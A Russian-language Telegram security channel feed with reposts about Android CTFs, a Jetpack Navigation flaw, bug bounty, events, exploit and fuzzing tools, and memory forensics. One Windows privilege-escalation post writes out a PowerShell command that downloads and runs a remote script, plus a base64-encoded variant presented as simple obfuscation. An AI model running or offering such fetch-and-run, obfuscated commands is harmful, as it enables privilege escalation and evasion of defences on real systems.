Forwarded from Mobile AppSec World (Yury Shabalin)
Статья для начинающих свой путь в Android
Всем привет!
Статейка для тех, кто только начинает свое знакомство с Android и хотел бы попробовать свои силы на нескольких CTF, чтобы понять какого это.
В статье описаны шаги для настройки окружения:
- Создание эмулятора
- Настройка Burpsuite
- Установка Frida
- Решение двух задачек с HackTheBox
В целом ничего особо примечательного, но как базовая точка для самого популярного вопроса «Как снять пиннинг» подойдет. Конечно, далеко не на всех приложениях эти шаги и этот скрипт сработают, но тем не менее, для старта неплохо.
Ну а дальше только снимать пиннинг и другие вещи с более сложных и не учебных приложений.
Добро пожаловать в мир безопасности мобилок»
#android #frida #ctf #burp
Всем привет!
Статейка для тех, кто только начинает свое знакомство с Android и хотел бы попробовать свои силы на нескольких CTF, чтобы понять какого это.
В статье описаны шаги для настройки окружения:
- Создание эмулятора
- Настройка Burpsuite
- Установка Frida
- Решение двух задачек с HackTheBox
В целом ничего особо примечательного, но как базовая точка для самого популярного вопроса «Как снять пиннинг» подойдет. Конечно, далеко не на всех приложениях эти шаги и этот скрипт сработают, но тем не менее, для старта неплохо.
Ну а дальше только снимать пиннинг и другие вещи с более сложных и не учебных приложений.
Добро пожаловать в мир безопасности мобилок»
#android #frida #ctf #burp
🔥10 4😁2
Forwarded from Mobile AppSec World (Yury Shabalin)
Разбираемся с уязвимостью в Jetpack Navigation
Всем привет!
Относительно недавно многоуважаемый @OxFi5t подсветил исследование коллег из Positive Technologies про новый вектор атаки на Android через проблемы в библиотеке Jetpack . Спасибо огромное им за исследование, оно реально крутое!
Мы не смогли остаться в стороне, тоже немного покапались в исследовании, нашли пару интересных вещей, не освещенных в оригинальном материале и сегодня я представляю вашему вниманию результат наших трудов, статью "Разбираемся с новой уязвимостью в Android-библиотеке Jetpack Navigation".
Кроме технических деталей самой проблемы мы еще дополнительно проанализировали 1000 приложений из различных маркетов и собрали интересную статистику по подверженности данной проблеме. Если кратко, то 21% из исследованых нами приложений содержит уязвимую навигацию. Эксплуатабельны ли они это отдельный вопрос, который, я надеюсь, мы разберем в дальнейшем обязательно))
Если интересно исследование с цифрами, какие категории оказались наиболее подвержены данной проблеме - можно посмотреть у нас на сайте.
А пока - приятного чтения и спасибо еще раз коллегам за шикарную уязвимость!
#jetpack #stingray #navigation #issue #research
Всем привет!
Относительно недавно многоуважаемый @OxFi5t подсветил исследование коллег из Positive Technologies про новый вектор атаки на Android через проблемы в библиотеке Jetpack . Спасибо огромное им за исследование, оно реально крутое!
Мы не смогли остаться в стороне, тоже немного покапались в исследовании, нашли пару интересных вещей, не освещенных в оригинальном материале и сегодня я представляю вашему вниманию результат наших трудов, статью "Разбираемся с новой уязвимостью в Android-библиотеке Jetpack Navigation".
Кроме технических деталей самой проблемы мы еще дополнительно проанализировали 1000 приложений из различных маркетов и собрали интересную статистику по подверженности данной проблеме. Если кратко, то 21% из исследованых нами приложений содержит уязвимую навигацию. Эксплуатабельны ли они это отдельный вопрос, который, я надеюсь, мы разберем в дальнейшем обязательно))
Если интересно исследование с цифрами, какие категории оказались наиболее подвержены данной проблеме - можно посмотреть у нас на сайте.
А пока - приятного чтения и спасибо еще раз коллегам за шикарную уязвимость!
#jetpack #stingray #navigation #issue #research
🔥4😁3⚡1
Убойное видео. Как я написал эксплоит для бага в Telegram и что было дальше
#xakep #telegram #1click
Помните нашумевшую багу в Telegram, когда под видом видео пользователь скачивал приложение. Так вот парень из нашего community сделал более глубокий ресерч этого бага. Статья 30 минутной давности)
🔓 Читать дальше
🌚 @poxek | 📹 YouTube
#xakep #telegram #1click
Помните нашумевшую багу в Telegram, когда под видом видео пользователь скачивал приложение. Так вот парень из нашего community сделал более глубокий ресерч этого бага. Статья 30 минутной давности)
Недавно мне на глаза попался пост примерно такого содержания: «В Telegram выявлена новая уязвимость, связанная с загрузкой видеороликов». К посту прилагалась демонстрация: пользователь получает видео, при тапе по которому Telegram пытается установить стороннее приложение. При этом проблема не привлекла особенного внимания. Я решил разобраться, работает ли способ, и написать к нему эксплоит.
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥11😁4🌚1
Bug Bounty в России: как дела с белыми русскими хакерами?
#vk #vkbugbounty
Статья от Петра, того самого чиляльщика (кто поймет, тот поймет)
Привет Хабр! Меня зовут Петр Уваров, я руководитель направления Bug Bounty в VK. Есть много статей, где багхантеры рассказывают о Bug Bounty и своем опыте в нем. Но в этой статье, я бы хотел проанализировать текущую ситуацию на российском рынке, сравнив её с тем, что было раньше, и поговорить про ситуацию с багхантерами. Некоторые вещи, которые я буду говорить прозвучат как цитаты Капитана Очевидность. Другие могут быть приписаны Генералу Ясенпеню, но тем не менее, про них стоит рассказать.
➡️ Читать далее
🌚 @poxek | 📹 YouTube
#vk #vkbugbounty
Статья от Петра, того самого чиляльщика (кто поймет, тот поймет)
Привет Хабр! Меня зовут Петр Уваров, я руководитель направления Bug Bounty в VK. Есть много статей, где багхантеры рассказывают о Bug Bounty и своем опыте в нем. Но в этой статье, я бы хотел проанализировать текущую ситуацию на российском рынке, сравнив её с тем, что было раньше, и поговорить про ситуацию с багхантерами. Некоторые вещи, которые я буду говорить прозвучат как цитаты Капитана Очевидность. Другие могут быть приписаны Генералу Ясенпеню, но тем не менее, про них стоит рассказать.
Please open Telegram to view this post
VIEW IN TELEGRAM
😁7👾2
Forwarded from Standoff 365
В среду, 31 июля, в 19:00 (мск) можно будет в прямом эфире посмотреть на триаж с двух сторон: глазами компаний-вендоров и команды Standoff Bug Bounty.
🥣 Готовь вопросы или задавай их прямо под постом, а мы передадим все гостям студии, среди которых будут:
✨
✨ Дарья Афанасова — руководитель группы триажа на платформе Standoff Bug Bounty.
✨ Анатолий Иванов aka c0rv4x — идейный лидер багбаунти Standoff, белый хакер с десятилетним стажем.
Они поговорят о том, как триажеры помогают багхантерам правильно составлять отчеты и не упускать важного, чтобы оперативнее получать фидбэк и вознаграждение от вендоров. А еще обсудят, как триаж сокращает путь от получения отчета до устранения уязвимости.
Регистрируйся заранее, чтобы не пропустить стрим. Увидимся в эфире!
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥24 7😁2⚡1
Forwarded from infosecurity
🎉 Результаты розыгрыша:
Победители:
1. Миша (@ponomarevmisha)
2. D1caprio (@P2Plegend)
3. Валерий (@valerixyz)
4. Розовый (@Chlypka)
5. Анютыч (@Annutych)
6. Dim (@DimGridAle)
7. степанк (@preteenbastard)
8. ctlh (@justsalohiddin)
9. Dmitrii (@romule090)
10. Антон (@amkashirin)
Проверить результаты
Победители:
1. Миша (@ponomarevmisha)
2. D1caprio (@P2Plegend)
3. Валерий (@valerixyz)
4. Розовый (@Chlypka)
5. Анютыч (@Annutych)
6. Dim (@DimGridAle)
7. степанк (@preteenbastard)
8. ctlh (@justsalohiddin)
9. Dmitrii (@romule090)
10. Антон (@amkashirin)
Проверить результаты
🔥13😁8
На 10к подписчиков ждите кое что классное 🌚
Так что зовите друзей, а если уже все тут, то заведите новых и позовите сюда :))
С любовью, Похек❤️
Так что зовите друзей, а если уже все тут, то заведите новых и позовите сюда :))
С любовью, Похек
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
😁36👾6 5
#windows #privesc
Маленький воскресный пост про очередной небольшой скрипт для поиска мисконфигураций в Windows, которые приводят к повышению привилегий. Но тем не менее репа собрали более 500 звёзд, значит заслуживает внимания.
Эксплуатация:
IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/enjoiz/Privesc/master/privesc.ps1")И вот простенькая обфускация:
$encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes('IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/enjoiz/Privesc/master/privesc.ps1")'))
powershell -e $encodedPlease open Telegram to view this post
VIEW IN TELEGRAM
🔥13⚡2
Forwarded from Road To Ipoteka
Райтап на Bug Bank oт CyberED
В июне у CyberED в их ежемесячном CTF была задачка основанная на реальном отчете на ББ, и за ее решение можно было получить ачивку и немного рейтинга на ББ платформе BI.ZONE.
Запуск задачки наложился с внутренним CTF на работе, и я залетел довольно поздно (старт был в субботу, а я открыл задачу только в понедельник). Задачка оказалась очень простая, решение заняло минут 15 – и то, я искал где подвох и внимательно смотрел по сторонам. В итоге я решил ее 31ым, но за отчет получил и ачивку и рейтинг на платформе BI.ZONE.
Собственно, решил опубликовать свой отчет, так как в комментариях был запрос🙂
В июне у CyberED в их ежемесячном CTF была задачка основанная на реальном отчете на ББ, и за ее решение можно было получить ачивку и немного рейтинга на ББ платформе BI.ZONE.
Запуск задачки наложился с внутренним CTF на работе, и я залетел довольно поздно (старт был в субботу, а я открыл задачу только в понедельник). Задачка оказалась очень простая, решение заняло минут 15 – и то, я искал где подвох и внимательно смотрел по сторонам. В итоге я решил ее 31ым, но за отчет получил и ачивку и рейтинг на платформе BI.ZONE.
Собственно, решил опубликовать свой отчет, так как в комментариях был запрос
Please open Telegram to view this post
VIEW IN TELEGRAM
Teletype
Райтап Bug Bank от CyberED
Анонс задачи:
👾8 3😁1
«Ты приходишь ко мне просить бюджет на ИБ, но...»
Защита бюджета в августе для CISO — жаркое время. Успех предприятия зависит не только от способности предвидеть риски и просчитать стоимость. Главное умение переговорщика — говорить именно так, как принято в финансовых кругах 💵
Есть информация, что на вебинаре 30 июля в 11:00 можно будет пообщаться с CISO в формате непринужденной дискуссии и узнать больше про доказательную базу при обосновании бюджета ИБ, а также узнать у CFO, как уважительно подбирать аргументы в беседе с финансовым кланом💰
О чём еще поведают уважаемые представители МТС RED:
➡ почему на ИБ стоит делать высокие ставки;
➡ как посчитать бюджет на примере мануфактур и предприятий;
➡ ИТ-директор как надёжный союзник в любой кампании;
➡ тактика и манёвры защиты глазами финансового консильери.
Кому будет полезно:
⏺ директорам или руководителям службы ИБ/ИТ;
⏺ финансовый директорам;
⏺ директорам по трансформации бизнеса.
Регистрируйтесь на вебинар и готовьте вопросы! Если что, нас тут не было🎩
Защита бюджета в августе для CISO — жаркое время. Успех предприятия зависит не только от способности предвидеть риски и просчитать стоимость. Главное умение переговорщика — говорить именно так, как принято в финансовых кругах 💵
Есть информация, что на вебинаре 30 июля в 11:00 можно будет пообщаться с CISO в формате непринужденной дискуссии и узнать больше про доказательную базу при обосновании бюджета ИБ, а также узнать у CFO, как уважительно подбирать аргументы в беседе с финансовым кланом💰
О чём еще поведают уважаемые представители МТС RED:
Кому будет полезно:
Регистрируйтесь на вебинар и готовьте вопросы! Если что, нас тут не было
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥7😁3🌚3👍1
Go Exploit Framework
#go
Go-exploit — это фреймворк для разработки эксплойтов на языке Go. Этот фреймворк помогает разрабам эксплойтов создавать небольшие, портативные эксплойты. Фреймворк был разработан для упрощения массового сканирования, эксплуатации и интеграции с другими инструментами.
Документацию по API можно найти ТУТ.
Фреймворк Go Exploit включает следующие этапы, которые могут быть связаны друг с другом или выполняться независимо:
Шаг 1 - Проверка цели
Шаг 2 - Сканирование версии
Шаг 3 - Эксплуатация
Шаг 4 - Управление и контроль
Особенности Go Exploit
Фреймворк Go Exploit включает следующие дополнительные функции:
➡️ Автоматическое обнаружение SSL/TLS на удаленной цели.
➡️ Полная поддержка работы через прокси.
➡️ Вывод в формате ключ-значение или JSON для легкой интеграции в другие автоматизированные системы.
➡️ Встроенные Java гаджеты, классы и инфраструктура LDAP.
➡️ Множество пейлоадов для реверс шеллов, дропперов и бинд шеллов.
➡️ Функции, интегрирующие эксплуатацию с другими инструментами или фреймворками, такими как Metasploit и Sliver.
➡️ Встроенный C2 для перехвата зашифрованных/незашифрованных шеллов или размещения имплантов.
➡️ Поддержка различных форматов целей, включая списки, файлы, VulnCheck IP-Intel и другие.
Мое мнение об этой тулзе: пока сыровато и маловато, НО я вижу перспективу в этой тулзе и возможно когда-нибудь она стрельнет или обзаведётся кучей "обвязок", которые сделают данную тулзу полноценно боевой
🌚 @poxek | 📹 YouTube
#go
Go-exploit — это фреймворк для разработки эксплойтов на языке Go. Этот фреймворк помогает разрабам эксплойтов создавать небольшие, портативные эксплойты. Фреймворк был разработан для упрощения массового сканирования, эксплуатации и интеграции с другими инструментами.
Документацию по API можно найти ТУТ.
Фреймворк Go Exploit включает следующие этапы, которые могут быть связаны друг с другом или выполняться независимо:
Шаг 1 - Проверка цели
Шаг 2 - Сканирование версии
Шаг 3 - Эксплуатация
Шаг 4 - Управление и контроль
Особенности Go Exploit
Фреймворк Go Exploit включает следующие дополнительные функции:
Мое мнение об этой тулзе: пока сыровато и маловато, НО я вижу перспективу в этой тулзе и возможно когда-нибудь она стрельнет или обзаведётся кучей "обвязок", которые сделают данную тулзу полноценно боевой
Please open Telegram to view this post
VIEW IN TELEGRAM
api-fuzzing-lists.zip
8.7 MB
API FUZZING LISTS
#api #fuzzing
Вне очереди пост, очень вкусный сборник фаззинг вордлистов для API
Описание данного списка от автора:
744,000+ endpoints
357,000+ object properties
211,000+ object names
127,000+ query parameters
74,000+ parameter values
35,000+ path parameters
8,300+ headers
5,300+ paths
880+ common ports
Взял ТУТ
🌚 @poxek | 📹 YouTube
#api #fuzzing
Вне очереди пост, очень вкусный сборник фаззинг вордлистов для API
Описание данного списка от автора:
744,000+ endpoints
357,000+ object properties
211,000+ object names
127,000+ query parameters
74,000+ parameter values
35,000+ path parameters
8,300+ headers
5,300+ paths
880+ common ports
Взял ТУТ
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥33
Идёт Zaheq. Приватное пати. Пришлось сделать двойной доклад, чтобы попасть на эту тусу)
Доклад нельзя было фоткать, потому что все приватно)
Выступал я, один секретный спикер, а также Омар с докладом про Вову Хакеру (и оказалось, что название не кликбейт было)))
🌚 @poxek
Доклад нельзя было фоткать, потому что все приватно)
Выступал я, один секретный спикер, а также Омар с докладом про Вову Хакеру (и оказалось, что название не кликбейт было)))
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥35😁7 3
Forwarded from Just Security
Долгожданный список финалистов единственной и неповторимой премии для этичных хакеров Pentest award 2024!
➖ Пробив WEB: за мастерство идентификации и эксплуатации уязвимостей в веб-сервисах, API и других компонентах веб-приложений. Курирует номинацию BI.ZONE Bug Bounty
Russian_OSlNT
maledictos
graph_sotskiy
kiriknik
sypso
jmaaax
AndrewYalta
elvisalarn
Bisch
lewaper
Byte_Wizard
Danr0
arkiix
cucurucuq
tr3harder
larch1k
shin0_by
w0ltage
rakel_stan
A32s51
sos1somba
➖ Пробив инфраструктуры: за проникновение и эксплуатацию уязвимостей сетевой инфраструктуры, включая, но не ограничиваясь, сетевыми устройствами, сетевыми сервисами и IoT-устройствами. Курирует номинацию VK Bug Bounty.
s0i37
ratel_xx
r00t_owl
killgoree
exe_cute
snovvcrash
Wdanya
ka1_ne
VlaDriev
Im10n
secm3_n
Tcr0ss
aiWeevi
dmitt22
AY_Serkov
➖ Девайс: за исследования технических недостатков, обнаруженных в разнообразных устройствах, прошивках и окружении.
ka1_ne
doe546052
drKeksik
Byte_Wizard
N0um3n0n
VlaDriev
r00t_owl
➖ Hack the logic: за находку самых топовых логических баг.
damnwaree
shdwpwn
sos1somba
Engineer586898
lewaper
w00t1
AndrewYalta
graph_sotskiy
jmaaax
brotherok
Byte_Wizard
only4u2day
m2ch3t3
guleroman
r0binak
WILD_41
arkiix
elvisalarn
telegadlyasvyazi2
dmarushkin
AndrewYalta
➖ Раз bypass, два bypass: за самый красивый обход средств защиты информации.
s0i37
snovvcrash
X0red
maledictos
Danr0
shin0_by
Human1231
vanja_b
curiv
➖ Ловись рыбка: за самый оригинальный фишинг или попытку засоциалить сотрудников.
X0red
s3n_q
post_gatto
szybnev
fromkhabar
P1N_C0DE
Ждем всех финалистов на церемонии награждения 2 августа в 18:30.
👉 Трансляция мероприятия доступна по ссылке.
#pentestaward
Russian_OSlNT
maledictos
graph_sotskiy
kiriknik
sypso
jmaaax
AndrewYalta
elvisalarn
Bisch
lewaper
Byte_Wizard
Danr0
arkiix
cucurucuq
tr3harder
larch1k
shin0_by
w0ltage
rakel_stan
A32s51
sos1somba
s0i37
ratel_xx
r00t_owl
killgoree
exe_cute
snovvcrash
Wdanya
ka1_ne
VlaDriev
Im10n
secm3_n
Tcr0ss
aiWeevi
dmitt22
AY_Serkov
ka1_ne
doe546052
drKeksik
Byte_Wizard
N0um3n0n
VlaDriev
r00t_owl
damnwaree
shdwpwn
sos1somba
Engineer586898
lewaper
w00t1
AndrewYalta
graph_sotskiy
jmaaax
brotherok
Byte_Wizard
only4u2day
m2ch3t3
guleroman
r0binak
WILD_41
arkiix
elvisalarn
telegadlyasvyazi2
dmarushkin
AndrewYalta
s0i37
snovvcrash
X0red
maledictos
Danr0
shin0_by
Human1231
vanja_b
curiv
X0red
s3n_q
post_gatto
szybnev
fromkhabar
P1N_C0DE
Ждем всех финалистов на церемонии награждения 2 августа в 18:30.
👉 Трансляция мероприятия доступна по ссылке.
#pentestaward
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥23 5
#forensic #memory_analysis #volatility
У меня такие кейсы на работе бывают. К счастью не инхаус, а консалтинг. И когда они бывают, я если честно теряюсь и не знаю, что делать. Т.к. каждый раз новая инфра, новый неизвестный вектор и всё это очень заряжает сделать свою работу по-красоте))
Так вот, если вы не гигачад форензик, то думаю следующая штука вам понравится:
VolWeb - это платформа, нацеленная на цифровой анализ памяти на наличие чего либо. Данная платформа, как ясно из названия взяла за основу Volatility 3 и возвела его в абсолют сделав к тому же красивый и вполне удобный веб интерфейс.
Как пишет разработчик:
Цель VolWeb — повысить эффективность сбора и анализа памяти, предоставляя централизованное, визуальное и расширенное веб-приложение для реагирования на инциденты и цифровой криминалистики. После того как исследователь получает образ памяти с системы Linux или Windows, доказательства могут быть загружены в VolWeb, что запускает автоматическую обработку и извлечение артефактов с помощью возможностей фреймворка Volatility 3.
Используя облачные технологии хранения, VolWeb также позволяет специалистам по реагированию на инциденты напрямую загружать образы памяти в платформу VolWeb из различных мест с помощью специальных скриптов, интегрированных с платформой и поддерживаемых сообществом. Еще одной целью является предоставление пользователям возможности собирать техническую информацию, такую как индикаторы, которые затем могут быть импортированы в современные платформы CTI, такие как OpenCTI, что позволяет связать команды реагирования на инциденты и CTI после завершения расследования.
Звучит просто кайф для форензика.
Документацию к VolWeb ТУТ
Также разработчики позаботились о нас и уже написали скрипты на powershell и python3 для загрузки данных на платформу.
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥19👍4 2⚡1😁1